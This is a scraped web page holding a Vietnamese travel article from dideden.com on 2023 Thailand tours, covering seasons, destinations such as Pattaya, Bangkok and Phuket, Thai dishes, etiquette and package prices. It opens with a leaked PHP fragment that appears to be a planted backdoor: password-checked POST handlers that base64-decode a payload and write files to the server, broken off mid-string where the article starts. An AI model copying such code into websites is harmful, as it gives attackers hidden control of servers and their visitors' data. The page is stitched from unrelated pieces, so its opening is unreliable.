function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Tour Thái Lan 2023 giá rẻ - Trọn bộ kinh nghiệm mới nhất

Tour Thái Lan 2023 giá rẻ – Trọn bộ kinh nghiệm mới nhất

30/09/2022 Đi Để Đến - Group

Thái Lan luôn là điểm đến được du khách yêu thích và lựa chọn vào mùa du lịch hàng năm. “Du lịch Thái Lan nên đi đâu ăn gì?” “Tour du lịch Thái Lan nào hấp dẫn trong năm nay?” là những câu hỏi mà du khách quan tâm. Nếu bạn đang có dự định du lịch Thái Lan thời gian tới, hãy cùng dideden.com khám phá các Tour Thái Lan 2023 lý tưởng ở bài viết dưới đây nhé.

Thái Lan là đất nước thu hút khách du lịch từ những giây phút đầu tiên đặt chân đến. Được biết đến là vương quốc của sự đa dạng vô tận sở hữu thiên đường ẩm thực độc đáo và văn hóa linh thiêng từ các ngôi đền chùa nguy nga, lộng lẫy. Vì vậy, du lịch đến Thái Lan là hành trình không thể quên đối với bất kỳ du khách nào. Điểm qua bài viết với trọn bộ kinh nghiệm mới nhất 2023 để có một chuyến đi du lịch Thái Lan ý nghĩa nhất.

DU LỊCH THÁI LAN – TRẢI NGHIỆM MÙA NÀO ĐẸP NHẤT?

1. Du lịch Thái Lan mùa khô

Thái Lan có khí hậu khô và nóng từ tháng 1 đến tháng 5. Nhiệt độ mùa khô tại Thái Lan có thể lên đến 40 độ C. Tuy nhiên, đây chính là thời điểm thu hút khách du lịch nhất trong năm tại xứ sở chùa vàng.

Từ tháng 3 đến tháng 5, du khách có thể lựa chọn ghé thăm các tỉnh miền núi phía Bắc Thái Lan. Vào những tháng này, thời tiết trên núi sẽ mát mẻ, ôn hòa để tham gia một số hoạt động ngoài trời có thể kể đến: tắm suối, chèo thuyền,…Ngược lại, du lịch tại các khu vực miền Trung và Đông Bắc Thái Lan vào mùa này, thời tiết nóng bức có thể khiến khách du lịch phải tạm hoãn các hoạt động du lịch đó.

Tour Thái Lan 2022 -mùa khô

Vẻ đẹp của vịnh Phang Nga trong mùa khô. Nguồn: Sưu tầm

Lựa chọn đi tour Thái Lan 2023 vào mùa khô, du khách được tận hưởng bãi biển rực rỡ ánh nắng và tham gia các hoạt động tập thể vui chơi giải trí dưới nước hấp dẫn. Đây cũng là thời điểm thích hợp để tổ chức các lễ hội đặc sắc tại Thái Lan. Du khách sẽ được thưởng thức những trận té nước hấp dẫn, vui nhộn tại lễ hội té nước Songkran – lễ hội lớn nhất tại quốc gia này được tổ chức vào tháng 4 hàng năm.

2. Du lịch Thái Lan mùa mưa

Thái Lan có mùa mưa trong khoảng thời gian từ tháng 6 đến tháng 10. Đây là thời điểm lý tưởng cho những ai yêu thích du lịch với không khí bình yên và lãng mạn. Những cơn mưa rào bất chợt tại Thái Lan vào mùa mưa khiến nhiều du khách thích thú bởi không khí mát mẻ và dễ chịu.

Ngoài ra, mùa mưa cũng là mùa của nhiều lễ hội Phật giáo tại Thái Lan. Du khách có thể đến thăm các khu chợ nổi, thăm thú và thưởng thức các loại trái cây đặc sản của Thái. Hoặc với du khách có niềm đam mê với mua sắm thì không thể bỏ qua cơ hội săn hàng giảm giá. Vì đây chính là thời điểm các mặt hàng tại Thái Lan có thể giảm giá đến hơn 80%.

Tour Thái Lan 2022 - Du lịch mùa mưa

Đường phố Thái Lan trong mùa mưa. Nguồn: Sưu tầm

3. Du lịch Thái Lan mùa mát

Nếu yêu thích thời tiết dễ chịu và mát mẻ thì du khách không thể bỏ lỡ chuyến đi du lịch Thái Lan vào tháng 11 đến tháng 12 trong năm. Đây chính là mùa du lịch cao điểm tại Thái Lan bởi du khách sẽ có cơ hội được trải nghiệm, khám phá các món đặc sản hấp dẫn.

Đây là dịp để du khách có thể tham gia các hoạt động lễ hội nổi tiếng như: Lễ hội hoa đăng truyền thống (Loy Krathong), Lễ hội Vua được tổ chức vào tháng 12,.. Các du khách sẽ có cơ hội được chiêm ngưỡng các lễ hội truyền thống với quy mô hoành tráng, mang nét văn hóa nổi bật đặc sắc.

Tour Thái Lan 2022 - mùa mát

Khí hậu và thời tiết của Chiangmai trong mùa mát. Nguồn: Sưu tầm

Như vậy, mỗi mùa tại Thái Lan đều có nét đặc trưng riêng nên du lịch Thái Lan mùa nào cũng đẹp. Du khách có thể lựa chọn đi du lịch Thái Lan vào bất kỳ thời điểm nào trong năm tùy thuộc theo sở thích và mong muốn trải nghiệm.

>>>Xem thêm: Tour du lịch Thái Lan 5N4Đ: Khám phá Bangkok, Pattaya

TOUR THÁI LAN 2023 VÀ NHỮNG ĐIỂM ĐẾN NHẤT ĐỊNH PHẢI GHÉ THĂM

Ngoài những gợi ý về thời điểm thích hợp, du khách cũng cần bỏ túi các địa điểm du lịch mà nhất định phải ghé thăm trong Tour Thái Lan 2023 của mình.

1. Thành phố biển Pattaya

Pattaya có vị trí cách thủ đô Thái Lan 165km về phía Đông Nam. Pattaya được mệnh danh là thành phố biển đẹp nhất nhì đất nước mà khách du lịch nhất định phải ghé qua trong chuyến hành trình. Pattaya nổi tiếng với hệ thống lưu trú đa dạng bao gồm khách sạn và các khu resort nghỉ dưỡng cao cấp như: Veranda Resort Pattaya, Sandalay Resort Pattaya,…

Tour Thái Lan 2022 - Pattaya

Thành phố biển Pattaya xinh đẹp. Nguồn: Sưu tầm

Thành phố biển Pattaya gồm có ba khu vực chính cho du khách lựa chọn lưu trú:

  • Khu phía Bắc Pattaya: Khu vực yên tĩnh phù hợp cho du lịch nghỉ dưỡng
  • Khu trung tâm Pattaya: Khu vực nhộn nhịp sầm uất tập trung nhiều khách du lịch
  • Khu phía Nam Pattaya: Khu vực nổi tiếng với nhiều quán ăn view biển thơ mộng, xinh đẹp

2. Thủ đô Bangkok – Thái Lan

Để có chuyến hành trình trải nghiệm tour Thái Lan 2023 trọn vẹn, du khách không thể không đặt chân đến Thủ đô BangKok. Ở Đông Nam Á, thủ đô Bangkok được xem là một trong những thành phố phát triển và sầm uất nhất trong khu vực.

Các địa điểm du lịch nổi bật ở thủ đô Bangkok là chùa chiền, cung điện. Một số công trình tiêu biểu có thể kể đến như Chùa Phật Vàng, Chùa Phật Ngọc, Chùa Cẩm thạch,… Bên cạnh các công trình chùa chiền với kiến trúc chùa tháp đặc trưng, Bangkok còn nổi tiếng với các cung điện, hoàng cung nguy nga như Cung điện Vimanmek, Cung điện Suan Pakkad,…

Tour Thái Lan 2022 - Bangkok

Thủ đô của xứ sở chùa vàng. Nguồn: Sưu tầm

Một địa điểm cần lưu ý nữa khi du lịch tại thủ đô Chùa Vàng trong tour Thái Lan 2023, đó là khám phá dòng sông Chao Phraya với hệ thống kênh rạch phong phú. Dòng sông mê hoặc khách du lịch bởi vẻ đẹp thơ mộng từ giây phút đầu tiên nhìn thấy. Được gọi là “Dòng sông của các vị vua”, Chao Phraya để lại bao ấn tượng và những khoảnh khắc đầy kỉ niệm trong những chuyến du ngoạn của du khách.

3. Điểm đến du lịch biển đảo – Phuket

Phuket là hòn đảo lớn nhất tại Thái Lan với môi trường sinh thái cực kỳ phong phú và hạ tầng đồng bộ phù hợp để phát triển du lịch. Bên cạnh đó, Phuket sở hữu nhiều địa điểm tham quan hấp dẫn bao gồm 32 hòn đảo lớn nhỏ khác nhau với cảnh thiên nhiên tuyệt đẹp.

Một số địa điểm du lịch mà du khách nên ghé thăm tại Phuket trong tour Thái Lan 2023 của mình:

  • Bãi biển Patong: Patong là một trong những bãi biển đẹp nhất tại Phuket với bờ biển dài rộng và bãi cát trắng mịn
  • Vịnh Phang Nga: mang nét đẹp hoang sơ, hùng vĩ. Đây cũng là địa điểm được yêu thích và lựa chọn bởi các đạo diễn cho nhiều bộ phim nổi tiếng: Công viên kỷ Jura, Điệp viên 007,…
  • Đô thị cổ Phuket: Bên cạnh hình ảnh thiên nhiên biển đảo, Phuket nổi tiếng với những con phố cổ mang nét kiến trúc cổ kính. Con phố dài 2km nhưng lại vô cùng yên tĩnh phù hợp để đi tản bộ và lưu giữ kỉ niệm bằng những tấm ảnh sống ảo trên đường phố.
    Tour Thái Lan 2022 - Phuket

    Thiên đường du lịch biển đảo Thái Lan. Nguồn: Sưu tầm

>>> Xem thêm: 6 điểm đến “đẹp rụng tim” ở Thái Lan bạn nên ghé thăm

KHÁM PHÁ THIÊN ĐƯỜNG ĐỒ ĂN TẠI XỨ CHÙA VÀNG

Xứ chùa Vàng với thiên đường ẩm thực độc đáo sở hữu nhiều món ăn đường phố có sự kết hợp hài hòa của nhiều loại gia vị khác nhau. Vì vậy, hãy lưu lại ngay top những món ăn nên thử trong Tour Thái Lan 2023 nhé.

1. Pad Thái

Pad Thái là một trong những món ăn nổi tiếng nhất tại Thái Lan mà du khách nhất định phải thử mỗi lần ghé qua. Pad Thái hay được gọi với cái tên khác là Bún xào, Phở xào được người Thái và du khách yêu thích bởi hương vị lan tỏa, là sự kết hợp của nhiều loại nguyên liệu khác nhau.

Pad Thái được làm từ sợi mì gạo tươi cùng các món ăn kèm như tôm, giá, trứng, hẹ. Tất cả các nguyên liệu hòa quyện với nhau tạo nên hương vị khó quên. Khi ăn Pad Thái, ta sẽ thấy được vị chua của chanh, vị cay của ớt và vị mặn của nước mắm. Pad Thái chính là món ăn được hòa trộn độc đáo mang nét riêng của nền ẩm thực Thái Lan.

Tour Thái Lan 2022 - Pad Thái

Món ăn truyền thống nổi tiếng của Thái Lan. Nguồn: Sưu tầm

2. Súp tôm chua cay – Tom Yum Goong

Nếu là người yêu thích hương vị chua cay thì không thể bỏ lỡ món súp tôm cay trong chuyến hành trình Tour Thái Lan 2023. Đây chính là món ăn đặc trưng nổi tiếng của nền ẩm thực xứ chùa Vàng. Súp chua cay được chế biến từ nhiều loại nguyên liệu khác nhau như ớt, sả, gừng, chanh, ngò, nước cốt dừa, tôm nõn,…

Tom yum là sự kết hợp độc đáo của hải sản và các loại gia vị tạo nên tổng thể món ăn hấp dẫn, bắt mắt và mang nét đặc trưng riêng. Du khách có thể dễ dàng thưởng thức món ăn này tại bất kỳ nhà hàng nào tại thủ đô Bangkok Thái Lan.

Tour Thái Lan 2022 - súp tôm chua cay

Món ăn nổi tiếng trong văn hóa ẩm thực Thái Lan. Nguồn: Sưu tầm

3. Xôi xoài – Khao niao muang

Xôi xoài là một trong những món ăn tráng miệng nổi tiếng nhất của Thái Lan. Món ăn là sự kết hợp của các nguyên liệu đơn giản của xoài, xôi nếp và nước cốt dừa nhưng lại mang đến sự bùng nổ vị giác khi thưởng thức.

Du khách có thể trải nghiệm món ăn này tại bất kỳ đâu trên đường phố Thái như nhà hàng và các quầy ăn vỉa hè. Xôi xoài hứa hẹn sẽ là món ăn vặt đặc biệt khi bạn đến du lịch tại Thái Lan.

Tour Thái Lan 2022 - Xôi xoài

Xôi xoài – Món tráng miệng hấp dẫn giàu dinh dưỡng. Nguồn: Sưu tầm

>>> Xem thêm: 4 khách sạn đẹp “phát hờn” gần đảo Phuket

4. Kem xôi dừa

Bên cạnh xôi xoài, kem xôi dừa cũng là một trong những món ăn vặt đường phố Thái Lan được nhiều người ưa chuộng hiện nay. Được làm từ nước cốt dừa và một số loại hoa quả sấy, kem xôi dừa mát lạnh có thể xóa tan sự mệt mỏi sau chuyến đi dài.

Kem xôi dừa có rất nhiều hương vị cho du khách với nhiều màu sắc khác nhau. Bên cạnh đó, du khách có thể yêu cầu người bán kết hợp nhiều hương vị khác nhau phụ thuộc theo sở thích. Đây cũng là món ăn tráng miệng ưa thích của trẻ nhỏ vào những dịp nắng nóng.

Tour Thái Lan 2022 - Kem xôi dừa

Kem xôi dừa cho tín đồ hảo ngọt. Nguồn: Sưu tầm

NHỮNG ĐIỀU NÊN LÀM VÀ KHÔNG NÊN LÀM KHI ĐI DU LỊCH THÁI LAN

1. Những điều nên làm khi du lịch Thái Lan

Thái Lan là nước quân chủ, tôn trọng Vua và Đức Phật. Vì vậy, khi đi tour Thái Lan 2023, du khách nên làm những điều dưới đây:

  • Kính trọng Hoàng Gia, Quốc vương và Đức Phật
  • Ăn mặc chỉnh tề và để giày dép ngoài cửa khi vào chùa
  • Chắp hai tay phía trước, cúi nhẹ người khi chào hỏi người Thái tại những nơi trang trọng.
  • Đưa đồ vật khi tặng quà cho người khác bằng tay phải
Tour Thái Lan 2022 - Phật

Chiêm ngưỡng bức tượng phật được chạm khắc tỉ mỉ của Thái Lan. Nguồn: Sưu tầm

2. Những điều không nên làm tại Thái Lan

Bên cạnh những điều nên làm, du khách cũng nên tránh thực hiện các hành động sau khi đặt chân đến đất nước Thái Lan.

  • Không được chạm vào đầu hoặc tóc của người Thái
  • Không để chân lên bàn khi ngồi
  • Không được thất lễ với nhà sư, Hoàng gia, Quốc vương và Đức phật

Trên đây là một số các lưu ý mà du khách nên ghi nhớ để có chuyến du lịch Tour Thái Lan 2023 vui vẻ và bình an.

>>>Xem thêm: Dịch vụ làm visa đi Thái Lan cho người nước ngoài

MỘT SỐ TOUR THÁI LAN 2023 GIÁ TỐT KHÔNG THỂ BỎ QUA

1. Tour Thái Lan 2023: Bangkok – Pattaya 5 ngày 4 đêm Thành phố cổ Muang Boran – Đảo Coral

Tour Thái Lan 2023: Bangkok – Pattaya 5 ngày 4 đêm – Thành phố cổ Muang Boran – Đảo Coral có giá dao động 7.490.000 trên 1 du khách người lớn. Du khách sẽ được bao trọn vé máy bay khứ hồi đến Bangkok cùng trải nghiệm tại khách sạn 4,5 sao đẳng cấp.

Ngoài ra, quý khách sẽ có cơ hội được tham quan các địa danh độc đáo và nổi tiếng như Chùa Phật Vàng, Chợ Nổi Bốn Miền, Chùa Thuyền Wat Yannawa,… và khám phá Đảo San Hô. Quý khách cũng sẽ được thưởng thức các loại Đặc sản Thái Lan vô cùng hấp dẫn trong thực đơn hàng ngày tại các điểm đến.

Tour Thái Lan 2022 - Thành phố cổ

Thành phố cổ xưa giữa Bangkok. Nguồn: Sưu tầm

2. Tour Thái Lan 2023: Khám phá Bangkok – Pattaya – Đi thuyền trên sông Chaophraya

Tour Thái Lan 2023 5 ngày 4 đêm khám phá BangKok -Pattaya dành cho người lớn có giá khoảng 17.000.000 đồng trên một người lớn. Du khách sẽ được vi vu khám phá đất nước chùa Vàng với những trải nghiệm khó quên như dạo thuyền trên sông Chao phraya, viếng thăm các ngôi chùa linh thiêng, khám phá Pattaya nhộn nhịp,…

Tour Thái Lan 2022 - Sông Chao

Sông Chao Phraya “huyền thoại” ở Thái Lan. Nguồn: Sưu tầm.

Bên cạnh đó, tour du lịch Thái Lan đã trọn gói cả vé máy bay và khách sạn 4 sao sang chảnh. Du khách cũng có cơ hội được thưởng thức bữa tiệc buffet tại tòa nhà cao nhất Thái Lan Baiyoke Sky. Vì vậy, hãy xách ba lô lên và bắt đầu chuyến hành trình tour Thái Lan 2023 ngay thôi nào!

>>> Xem thêm: Top khách sạn “độc lạ” chỉ từ 200k tại Thái Lan

Hy vọng sau khi đọc bài viết của dideden.com, bạn đã tìm được tour Thái Lan 2023 phù hợp với sở thích du lịch của bạn. Nếu bạn muốn có một chuyến đi Thái Lan để tự mình khám phá đất nước xứ sở chùa Vàng thì hãy gọi vào số hotline 1900 3398 để được hỗ trợ và tư vấn nhé!

ĐĂNG KÍ ĐẶT TOUR DU LỊCH THÁI LAN

Xem thêm >>> Tour du lịch Thái lan trọn gói 2023 hấp dẫn đáng để thử

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]